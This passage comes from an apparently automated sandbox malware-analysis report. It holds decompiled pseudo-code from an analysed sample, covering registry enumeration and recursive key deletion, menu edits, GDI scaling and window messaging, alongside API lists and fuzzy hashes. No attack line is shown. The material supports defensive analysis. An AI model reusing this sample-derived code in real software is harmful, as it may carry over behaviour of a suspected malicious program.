                  Similarity
                  • API ID: LongWindow$MessageSend_memset
                  • String ID: ,
                  • API String ID: 2997958587-3772416878
                  • Opcode ID: b20ac35b66c4cdd383068926631af7f25a1f3221c8ae416a670efe0955ee868a
                  • Instruction ID: 7f9eb07dc8cd5887cb77f9411831f1f819b3d5f976bf49b5c8f03c9bda67ac66
                  • Opcode Fuzzy Hash: b20ac35b66c4cdd383068926631af7f25a1f3221c8ae416a670efe0955ee868a
                  • Instruction Fuzzy Hash: 0131A331600715AFCB20AF76C884A6AB7E4BF48314F15093EF545A7BD2DB39E815CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416B30, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 70%
                  			E00416B30(void* __ebx, void* __ecx, void __edx, void* __edi, void* __esi, void* __eflags) {
				void _t36;
				void* _t46;
				long _t60;
				void* _t65;
				void* _t81;
				void* _t82;
				intOrPtr _t90;

				_t77 = __edx;
				_t68 = __ecx;
				_t67 = __ebx;
				_push(0x124);
				E00431B04(E0044B492, __ebx, __edi, __esi);
				_t81 = __ecx;
				 *(_t82 - 0x120) = 0;
				 *(_t82 - 0x12c) = 0;
				_t36 = E004165DF(__ecx, __edx);
				 *(_t82 - 0x128) = _t36;
				if(_t36 != 0) {
					do {
						_t65 = _t82 - 0x128;
						_push(_t65);
						_t68 = _t81;
						E004165F0();
						if(_t65 != 0) {
							_t77 =  *_t65;
							_t68 = _t65;
							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *(_t82 - 0x128) != 0);
				}
				if( *((intOrPtr*)(_t81 + 0x54)) != 0) {
					_t90 =  *((intOrPtr*)(_t81 + 0x68));
					_t91 = _t90 == 0;
					if(_t90 == 0) {
						E00406436(_t67, _t68, 0, _t81, _t91);
					}
					_push("Software\\");
					E00406039(_t67, _t82 - 0x11c, _t77, 0, _t81, _t91);
					 *((intOrPtr*)(_t82 - 4)) = 0;
					E00405EC1(_t82 - 0x11c,  *((intOrPtr*)(_t81 + 0x54)));
					_push("\\");
					_push(_t82 - 0x11c);
					_push(_t82 - 0x130);
					_t46 = E00416856(_t67, 0, _t81, _t91);
					_push( *((intOrPtr*)(_t81 + 0x68)));
					 *((char*)(_t82 - 4)) = 1;
					_push(_t46);
					_push(_t82 - 0x124);
					E00416856(_t67, 0, _t81, _t91);
					 *((char*)(_t82 - 4)) = 3;
					E004010B0( *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0, _t77);
					_push(_t82 - 0x124);
					_t81 = 0x80000001;
					_push(0x80000001);
					E00416900(_t67, _t77, 0, 0x80000001, _t91);
					if(RegOpenKeyA(0x80000001,  *(_t82 - 0x11c), _t82 - 0x120) == 0) {
						_t60 = RegEnumKeyA( *(_t82 - 0x120), 0, _t82 - 0x118, 0x104);
						_t93 = _t60 - 0x103;
						if(_t60 == 0x103) {
							_push(_t82 - 0x11c);
							_push(0x80000001);
							E00416900(_t67, _t77, 0, 0x80000001, _t93);
						}
						RegCloseKey( *(_t82 - 0x120));
					}
					RegQueryValueA(_t81,  *(_t82 - 0x124), _t82 - 0x118, _t82 - 0x12c);
					E004010B0( &(( *(_t82 - 0x124))[0xfffffffffffffff0]), _t77);
					E004010B0( &(( *(_t82 - 0x11c))[0xfffffffffffffff0]), _t77);
				}
				return E00431B87(_t67, 0, _t81);
			}










                  0x00416b30
                  0x00416b30
                  0x00416b30
                  0x00416b30
                  0x00416b3a
                  0x00416b41
                  0x00416b43
                  0x00416b49
                  0x00416b4f
                  0x00416b54
                  0x00416b5c
                  0x00416b5e
                  0x00416b5e
                  0x00416b64
                  0x00416b65
                  0x00416b67
                  0x00416b6e
                  0x00416b70
                  0x00416b77
                  0x00416b79
                  0x00416b79
                  0x00416b7c
                  0x00416b5e
                  0x00416b87
                  0x00416b8f
                  0x00416b95
                  0x00416b97
                  0x00416b99
                  0x00416b99
                  0x00416b9e
                  0x00416ba9
                  0x00416bb7
                  0x00416bba
                  0x00416bbf
                  0x00416bca
                  0x00416bd1
                  0x00416bd2
                  0x00416bd7
                  0x00416bda
                  0x00416bde
                  0x00416be5
                  0x00416be6
                  0x00416bf7
                  0x00416bfb
                  0x00416c06
                  0x00416c07
                  0x00416c0c
                  0x00416c0d
                  0x00416c28
                  0x00416c3d
                  0x00416c43
                  0x00416c48
                  0x00416c50
                  0x00416c51
                  0x00416c52
                  0x00416c52
                  0x00416c5d
                  0x00416c5d
                  0x00416c78
                  0x00416c87
                  0x00416c95
                  0x00416c95
                  0x00416ca2

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00416B3A
                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00416C20
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00416C3D
                  • RegCloseKey.ADVAPI32(?), ref: 00416C5D
                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 00416C78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseEnumH_prolog3_OpenQueryValue
                  • String ID: Software\
                  • API String ID: 1666054129-964853688
                  • Opcode ID: 2c69f8e9fb3cf1b68887677988b198adb23b804070d639b6a360ee49bf6eecd0
                  • Instruction ID: 2bc0dbd4b1b81aecab4d277785a25c5ce037b4448173150856faaa691a74c426
                  • Opcode Fuzzy Hash: 2c69f8e9fb3cf1b68887677988b198adb23b804070d639b6a360ee49bf6eecd0
                  • Instruction Fuzzy Hash: 29418F718001289BCF21EB65CC45ADEB7B9AF49314F1001EAF145E22A1DB389AD1CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004146D0, Relevance: 10.6, APIs: 7, Instructions: 96windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E004146D0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t31;
				char* _t37;
				char* _t46;
				intOrPtr _t51;
				void* _t61;
				char* _t64;
				signed int _t72;
				void* _t74;

				_t61 = __edx;
				_t53 = __ecx;
				_push(4);
				E00431A9B(E0044C66E, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t74 - 0x10)) = __ecx;
				_t76 =  *(_t74 + 0xc) & 0x00000004;
				 *((intOrPtr*)(__ecx + 0xc8)) = 1;
				_t31 = 0x80c83b00;
				if(( *(_t74 + 0xc) & 0x00000004) != 0) {
					_t31 = 0x80c83300;
				}
				if(E00424F26(_t53, _t76, 0, 0, 0x44f0f5, _t31, 0x46279c,  *((intOrPtr*)(_t74 + 8)), 0) != 0) {
					asm("sbb esi, esi");
					_t72 = ( ~( *(_t74 + 0xc) & 0x00005000) & 0xfffff000) + 0x00002000 |  *(_t74 + 0xc) & 0x00000040;
					_t64 = E004133BB(_t51, 0);
					__eflags = _t64;
					if(_t64 != 0) {
						DeleteMenu(_t64[4], 0xf000, 0);
						DeleteMenu(_t64[4], 0xf020, 0);
						DeleteMenu(_t64[4], 0xf030, 0);
						DeleteMenu(_t64[4], 0xf120, 0);
						E004014C0(_t74 + 0xc, _t61);
						 *(_t74 - 4) =  *(_t74 - 4) & 0x00000000;
						_t46 = E00402720(_t74 + 0xc, 0xf011);
						__eflags = _t46;
						if(_t46 != 0) {
							DeleteMenu(_t64[4], 0xf060, 0);
							AppendMenuA(_t64[4], 0, 0xf060,  *(_t74 + 0xc));
						}
						 *(_t74 - 4) =  *(_t74 - 4) | 0xffffffff;
						__eflags =  &(( *(_t74 + 0xc))[0xfffffffffffffff0]);
						E004010B0( &(( *(_t74 + 0xc))[0xfffffffffffffff0]), _t61);
						_t51 =  *((intOrPtr*)(_t74 - 0x10));
					}
					_t65 = _t51 + 0xf8;
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xf8)) + 0x17c))( *((intOrPtr*)(_t74 + 8)), _t72 | 0x50000000, 0xe81f);
					__eflags = _t37;
					if(_t37 != 0) {
						E004133D6(_t65, _t51);
						_t37 = 1;
					}
					 *(_t51 + 0xc8) =  *(_t51 + 0xc8) & 0x00000000;
					goto L4;
				} else {
					 *(_t51 + 0xc8) = 0;
					L4:
					return E00431B73(_t37);
				}
			}











                  0x004146d0
                  0x004146d0
                  0x004146d0
                  0x004146d7
                  0x004146dc
                  0x004146de
                  0x004146e1
                  0x004146e5
                  0x004146ef
                  0x004146f4
                  0x004146f6
                  0x004146f6
                  0x00414715
                  0x00414732
                  0x00414746
                  0x0041474d
                  0x0041474f
                  0x00414751
                  0x00414767
                  0x00414773
                  0x0041477f
                  0x0041478b
                  0x00414790
                  0x00414795
                  0x004147a1
                  0x004147a6
                  0x004147a8
                  0x004147b4
                  0x004147c3
                  0x004147c3
                  0x004147cc
                  0x004147d0
                  0x004147d3
                  0x004147d8
                  0x004147d8
                  0x004147ea
                  0x004147f4
                  0x004147fa
                  0x004147fc
                  0x0041480d
                  0x00414814
                  0x00414814
                  0x004147fe
                  0x00000000
                  0x00414717
                  0x00414717
                  0x0041471d
                  0x00414722
                  0x00414722

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004146D7
                    • Part of subcall function 004133BB: GetSystemMenu.USER32(?,?), ref: 004133C6
                  • DeleteMenu.USER32(?,0000F000,00000000), ref: 00414767
                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 00414773
                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 0041477F
                  • DeleteMenu.USER32(?,0000F120,00000000), ref: 0041478B
                  • DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 004147B4
                  • AppendMenuA.USER32 ref: 004147C3
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$Delete$AppendH_prolog3System
                  • String ID:
                  • API String ID: 1427010815-0
                  • Opcode ID: aff83d87a85b773f964931b9adbbd999ef37a797d0e26fff4b4aa0b383d6ff58
                  • Instruction ID: fa170293c447da0cf328da5eff8f5daf512e33c4efadb7408d9be9ec5d0d8651
                  • Opcode Fuzzy Hash: aff83d87a85b773f964931b9adbbd999ef37a797d0e26fff4b4aa0b383d6ff58
                  • Instruction Fuzzy Hash: 8331E671640606BBEB205F21CC86FB97660AF44754F108239FA296F2E1DB78AC50D75C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042DA25, Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042DA25(void* __ebx, int __ecx, void* __edi, intOrPtr _a4) {
				struct HDC__* _t26;
				struct tagSIZE* _t39;
				struct tagSIZE* _t47;
				int _t50;
				int _t51;
				int _t52;
				void* _t54;

				_t41 = __ecx;
				_t52 = __ecx;
				if(_a4 != 0) {
					_t39 = __ecx + 0x38;
					GetViewportExtEx( *(__ecx + 8), _t39);
					_t47 = __ecx + 0x30;
					GetWindowExtEx( *(__ecx + 8), _t47);
					_t54 = _t47->cx - 0xffffc000;
					while(_t54 > 0) {
						if(_t47->cx < 0x4000) {
							_t41 = _t39->cx;
							if(_t41 > 0xffffc000 && _t41 < 0x4000) {
								_t41 = _t41 + _t41;
								_t47->cx = _t47->cx + _t47->cx;
								_t39->cx = _t41;
								continue;
							}
						}
						break;
					}
					if( *(_t52 + 0x34) > 0xffffc000) {
						while(1) {
							_t50 =  *(_t52 + 0x34);
							if(_t50 >= 0x4000) {
								goto L12;
							}
							_t41 =  *(_t52 + 0x3c);
							if(_t41 > 0xffffc000 && _t41 < 0x4000) {
								_t51 = _t50 + _t50;
								_t41 = _t41 + _t41;
								 *(_t52 + 0x34) = _t51;
								 *(_t52 + 0x3c) = _t41;
								if(_t51 > 0xffffc000) {
									continue;
								}
							}
							goto L12;
						}
					}
					L12:
					_t39->cx = E0042CB79(_t41, _t39->cx,  *((intOrPtr*)(_t52 + 0x10)),  *0x466528,  *((intOrPtr*)(_t52 + 0x14)), GetDeviceCaps( *(_t52 + 8), 0x58));
					 *(_t52 + 0x3c) = E0042CB79(_t41,  *(_t52 + 0x3c),  *((intOrPtr*)(_t52 + 0x10)),  *0x46652c,  *((intOrPtr*)(_t52 + 0x14)), GetDeviceCaps( *(_t52 + 8), 0x5a));
				}
				_t26 =  *(_t52 + 4);
				if(_t26 != 0) {
					SetMapMode(_t26, 8);
					SetWindowExtEx( *(_t52 + 4),  *(_t52 + 0x30),  *(_t52 + 0x34), 0);
					SetViewportExtEx( *(_t52 + 4),  *(_t52 + 0x38),  *(_t52 + 0x3c), 0);
					return E0042D94D(_t52);
				}
				return _t26;
			}










                  0x0042da25
                  0x0042da2f
                  0x0042da31
                  0x0042da39
                  0x0042da40
                  0x0042da46
                  0x0042da4d
                  0x0042da58
                  0x0042da76
                  0x0042da5e
                  0x0042da60
                  0x0042da64
                  0x0042da6e
                  0x0042da70
                  0x0042da72
                  0x00000000
                  0x0042da74
                  0x0042da64
                  0x00000000
                  0x0042da5e
                  0x0042da80
                  0x0042da82
                  0x0042da82
                  0x0042da87
                  0x00000000
                  0x00000000
                  0x0042da89
                  0x0042da8e
                  0x0042da94
                  0x0042da96
                  0x0042da9a
                  0x0042da9d
                  0x0042daa0
                  0x00000000
                  0x00000000
                  0x0042daa0
                  0x00000000
                  0x0042da8e
                  0x0042da82
                  0x0042daa2
                  0x0042dac8
                  0x0042dae2
                  0x0042dae5
                  0x0042dae6
                  0x0042daeb
                  0x0042daf0
                  0x0042db01
                  0x0042db12
                  0x00000000
                  0x0042db1a
                  0x0042db21

                  APIs
                  • GetViewportExtEx.GDI32(00000000,?), ref: 0042DA40
                  • GetWindowExtEx.GDI32(00000000,?), ref: 0042DA4D
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0042DAAD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042DACA
                  • SetMapMode.GDI32(?,00000008), ref: 0042DAF0
                  • SetWindowExtEx.GDI32(?,?,?,00000000), ref: 0042DB01
                  • SetViewportExtEx.GDI32(?,?,?,00000000), ref: 0042DB12
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CapsDeviceViewportWindow$Mode
                  • String ID:
                  • API String ID: 396987064-0
                  • Opcode ID: d440de2a9390ac2520f05333e535efbc71bd750e38a2d884d07320e4bff5a10b
                  • Instruction ID: e6f6d9ad73a54bed525db6a91c032bac503609f285183dbfdb4a3afa3b566461
                  • Opcode Fuzzy Hash: d440de2a9390ac2520f05333e535efbc71bd750e38a2d884d07320e4bff5a10b
                  • Instruction Fuzzy Hash: 4D317232600A11EFDB315F56ED41E1ABBF6FF98700794982DE15682A60D775B850CF04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416900, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00416900(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t38;
				void* _t51;
				void* _t54;
				signed int _t57;
				void* _t67;
				void* _t71;
				void* _t73;
				void* _t76;

				_t76 = __eflags;
				_t67 = __edx;
				_t57 = __ebx;
				_push(0x124);
				E00431B3A(E0044B41E, __ebx, __edi, __esi);
				_t71 =  *(_t73 + 8);
				 *(_t73 - 0x12c) = _t71;
				E00405562(_t73 - 0x124, _t76,  *((intOrPtr*)(_t73 + 0xc)));
				 *((intOrPtr*)(_t73 - 4)) = 0;
				if(_t71 == 0x80000000) {
					_t51 = E0041EC3D();
					_t78 = _t51 - 1;
					if(_t51 == 1) {
						_push(_t73 - 0x124);
						_push("Software\\Classes\\");
						_push(_t73 - 0x120);
						_t54 = E004168AB(__ebx, 0, _t71, _t78);
						 *((char*)(_t73 - 4)) = 1;
						E004056C2(__ebx, _t73 - 0x124, _t54);
						 *((char*)(_t73 - 4)) = 0;
						E004010B0( *((intOrPtr*)(_t73 - 0x120)) + 0xfffffff0, _t67);
						 *(_t73 - 0x12c) = 0x80000001;
					}
				}
				_t38 = RegOpenKeyA( *(_t73 - 0x12c),  *(_t73 - 0x124), _t73 - 0x128);
				_t72 = _t38;
				if(_t38 != 0) {
					L11:
					__eflags =  &(( *(_t73 - 0x124))[0xfffffffffffffff0]);
					E004010B0( &(( *(_t73 - 0x124))[0xfffffffffffffff0]), _t67);
					return E00431B96(_t57, 0, _t72);
				} else {
					while(1) {
						_t72 = RegEnumKeyA( *(_t73 - 0x128), 0, _t73 - 0x11c, 0x104);
						_t81 = _t72;
						if(_t72 != 0) {
							break;
						}
						_push(_t73 - 0x11c);
						 *((char*)(_t73 - 4)) = 2;
						E00406039(_t57, _t73 - 0x120, _t67, 0, _t72, _t81);
						 *((char*)(_t73 - 4)) = 3;
						_t72 = E00416900(_t57, _t67, 0, _t72, _t81,  *(_t73 - 0x128), _t73 - 0x120);
						_t57 = _t57 & 0xffffff00 | _t72 != 0x00000000;
						 *((char*)(_t73 - 4)) = 2;
						E004010B0( *((intOrPtr*)(_t73 - 0x120)) + 0xfffffff0, _t67);
						if(_t57 != 0) {
							break;
						}
						 *((intOrPtr*)(_t73 - 4)) = 0;
					}
					__eflags = _t72 - 0x103;
					if(_t72 == 0x103) {
						L9:
						_t72 = RegDeleteKeyA( *(_t73 - 0x12c),  *(_t73 - 0x124));
						L10:
						RegCloseKey( *(_t73 - 0x128));
						goto L11;
					}
					__eflags = _t72 - 0x3f2;
					if(_t72 != 0x3f2) {
						goto L10;
					}
					goto L9;
				}
			}











                  0x00416900
                  0x00416900
                  0x00416900
                  0x00416900
                  0x0041690a
                  0x00416912
                  0x0041691c
                  0x00416922
                  0x00416929
                  0x00416932
                  0x00416934
                  0x00416939
                  0x0041693c
                  0x00416944
                  0x0041694b
                  0x00416950
                  0x00416951
                  0x00416960
                  0x00416964
                  0x00416972
                  0x00416976
                  0x0041697b
                  0x0041697b
                  0x0041693c
                  0x00416998
                  0x0041699e
                  0x004169a2
                  0x00416a66
                  0x00416a6c
                  0x00416a6f
                  0x00416a7b
                  0x004169a8
                  0x004169a8
                  0x004169c1
                  0x004169c3
                  0x004169c5
                  0x00000000
                  0x00000000
                  0x004169cd
                  0x004169d4
                  0x004169d8
                  0x004169ea
                  0x004169f9
                  0x004169fd
                  0x00416a03
                  0x00416a07
                  0x00416a0e
                  0x00000000
                  0x00000000
                  0x00416a10
                  0x00416a10
                  0x00416a36
                  0x00416a3c
                  0x00416a46
                  0x00416a58
                  0x00416a5a
                  0x00416a60
                  0x00000000
                  0x00416a60
                  0x00416a3e
                  0x00416a44
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416a44

                  APIs
                  • __EH_prolog3_catch_GS.LIBCMT ref: 0041690A
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00416998
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 004169BB
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EnumH_prolog3H_prolog3_catch_Open
                  • String ID: Software\Classes\
                  • API String ID: 3518408925-1121929649
                  • Opcode ID: e3c2d5f4c53faedf68658fe16a846a1c51aaa5f659ad65bbad251e652c178414
                  • Instruction ID: 9bc735b9683b0f1466790649354c91e8bae961b69db05001f0a35a48de0ea7d3
                  • Opcode Fuzzy Hash: e3c2d5f4c53faedf68658fe16a846a1c51aaa5f659ad65bbad251e652c178414
                  • Instruction Fuzzy Hash: D931A331C001289BCF21EB64CD40BDDB7B4AF09350F0141EAE99973291DA345FD48F95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004052B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 53%
                  			E004052B0(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v28;
				char _v544;
				int _v548;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t22;
				intOrPtr* _t24;
				intOrPtr _t29;
				intOrPtr _t33;
				int _t39;
				void* _t44;
				void* _t55;
				intOrPtr* _t56;
				void* _t57;
				void* _t58;
				void* _t60;
				signed int _t63;

				_t44 = __ebx;
				_t61 = _t63;
				_t22 =  *0x463404; // 0x38a11573
				_v8 = _t22 ^ _t63;
				_t56 = __ecx;
				_t24 = E0040474E(__ecx);
				_t54 =  *_t24;
				 *((intOrPtr*)( *_t24 + 0x178))(_a4, _t55, _t60);
				if((E00412B38(__ecx) & 0x00008000) != 0) {
					_t51 = __ecx;
					_t26 =  *((intOrPtr*)( *__ecx + 0x144))();
					if(_a4 != 0) {
						_push(_t58);
						_push(0xffffffff);
						if(_t26 != 0) {
							_t29 =  *((intOrPtr*)(_t26 + 0x20));
						} else {
							_t29 =  *((intOrPtr*)(__ecx + 0xc4));
						}
						_push(_t29);
						_push(0x204);
						_push( &_v544);
						E004048C1(_t44, _t51, _t56, 0x204, E00431784());
						_t33 =  *((intOrPtr*)(_t56 + 0x58));
						if(_t33 > 0) {
							swprintf( &_v28, 0x11, ":%d", _t33, _t44);
							_v548 = lstrlenA( &_v28);
							_t39 = lstrlenA( &_v544);
							_t51 = _v548 + _t39;
							_pop(_t44);
							if(_v548 + _t39 < 0x204) {
								E004048C1(_t44, _t51, _t56, 0x204, E004317A1(_t54,  &_v544, 0x204,  &_v28));
							}
						}
						_t26 = E0041FC5A(_t51, _t54,  *((intOrPtr*)(_t56 + 0x20)),  &_v544);
						_pop(_t58);
					}
				}
				_pop(_t57);
				return E00430650(_t26, _t44, _v8 ^ _t61, _t54, _t57, _t58);
			}






















                  0x004052b0
                  0x004052b3
                  0x004052bb
                  0x004052c2
                  0x004052c6
                  0x004052c8
                  0x004052d0
                  0x004052d4
                  0x004052e6
                  0x004052ee
                  0x004052f0
                  0x004052fa
                  0x00405300
                  0x00405301
                  0x0040530a
                  0x00405314
                  0x0040530c
                  0x0040530c
                  0x0040530c
                  0x00405317
                  0x0040531e
                  0x0040531f
                  0x00405326
                  0x0040532b
                  0x00405333
                  0x00405342
                  0x0040535d
                  0x00405363
                  0x0040536b
                  0x0040536d
                  0x00405370
                  0x00405384
                  0x00405389
                  0x00405370
                  0x00405396
                  0x0040539b
                  0x0040539b
                  0x004052fa
                  0x004053a1
                  0x004053a8

                  APIs
                    • Part of subcall function 0040474E: GetParent.USER32(?), ref: 0040475A
                    • Part of subcall function 0040474E: GetParent.USER32(00000000), ref: 0040475D
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • __cftof.LIBCMT ref: 00405320
                  • swprintf.LIBCMT ref: 00405342
                  • lstrlenA.KERNEL32(?), ref: 00405354
                  • lstrlenA.KERNEL32(?), ref: 00405363
                  • _strcat_s.LIBCMT ref: 0040537E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Parentlstrlen$LongWindow__cftof_strcat_sswprintf
                  • String ID: :%d
                  • API String ID: 1631328139-1955712242
                  • Opcode ID: a3ed0814bc3c88985df354d893b6ce983353cf69c6df732c2c712562beb77c94
                  • Instruction ID: e46ddc5a9b823e7d646c18db364a7f4297011ab93b4b5035d7968b8aff5587db
                  • Opcode Fuzzy Hash: a3ed0814bc3c88985df354d893b6ce983353cf69c6df732c2c712562beb77c94
                  • Instruction Fuzzy Hash: A2219471A00208ABDB14EB65CC89EEFB76CEF48354F10057AF90597292DB78DD458B98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040A4A9, Relevance: 10.6, APIs: 7, Instructions: 80windowthreadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040A4A9(intOrPtr* __ecx, long _a4) {
				void* __ebx;
				void* _t26;
				signed int _t27;
				long _t40;
				signed int _t43;
				intOrPtr* _t54;

				_t47 = __ecx;
				_t43 = _a4;
				_t54 = __ecx;
				if(_t43 != 0 && ( *(__ecx + 0x3c) & 0x00000004) != 0) {
					E00412C76(__ecx, 0);
					return SetFocus(0);
				}
				_t26 = E0040EE3C(_t43, _t47, GetParent( *(_t54 + 0x20)));
				if(_t26 == 0) {
					L5:
					if(_t43 != 0) {
						_t27 =  *(_t54 + 0x3c);
						if(_t27 < 0) {
							 *(_t54 + 0x3c) = _t27 & 0xffffff7f;
							 *((intOrPtr*)( *_t54 + 0x104))();
							_a4 =  *(_t54 + 0x20);
							if(GetActiveWindow() == _a4) {
								SendMessageA(_a4, 6, 1, 0);
							}
						}
						if(( *(_t54 + 0x3c) & 0x00000020) != 0) {
							SendMessageA( *(_t54 + 0x20), 0x86, 1, 0);
						}
					} else {
						if( *((intOrPtr*)(_t54 + 0xb8)) == 0) {
							 *(_t54 + 0x3c) =  *(_t54 + 0x3c) | 0x00000080;
							 *((intOrPtr*)( *_t54 + 0x100))();
						}
					}
					asm("sbb ebx, ebx");
					return E00408A69(_t54, ( ~_t43 & 0xfffffff0) + 0x20);
				} else {
					_a4 = 0;
					GetWindowThreadProcessId( *(_t26 + 0x20),  &_a4);
					_t40 = GetCurrentProcessId();
					if(_t40 == _a4) {
						return _t40;
					}
					goto L5;
				}
			}









                  0x0040a4a9
                  0x0040a4af
                  0x0040a4b6
                  0x0040a4ba
                  0x0040a4c3
                  0x00000000
                  0x0040a4c9
                  0x0040a4de
                  0x0040a4e5
                  0x0040a507
                  0x0040a509
                  0x0040a526
                  0x0040a531
                  0x0040a538
                  0x0040a53f
                  0x0040a548
                  0x0040a554
                  0x0040a55f
                  0x0040a55f
                  0x0040a554
                  0x0040a565
                  0x0040a573
                  0x0040a573
                  0x0040a50b
                  0x0040a511
                  0x0040a515
                  0x0040a51e
                  0x0040a51e
                  0x0040a511
                  0x0040a577
                  0x00000000
                  0x0040a4e7
                  0x0040a4ef
                  0x0040a4f2
                  0x0040a4f8
                  0x0040a501
                  0x0040a58b
                  0x0040a58b
                  0x00000000
                  0x0040a501

                  APIs
                  • SetFocus.USER32(00000000,00000000), ref: 0040A4C9
                  • GetParent.USER32(?), ref: 0040A4D7
                  • GetWindowThreadProcessId.USER32(?,?), ref: 0040A4F2
                  • GetCurrentProcessId.KERNEL32 ref: 0040A4F8
                  • GetActiveWindow.USER32 ref: 0040A54B
                  • SendMessageA.USER32(?,00000006,00000001,00000000), ref: 0040A55F
                  • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 0040A573
                    • Part of subcall function 00412C76: EnableWindow.USER32(?,?), ref: 00412C87
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                  • String ID:
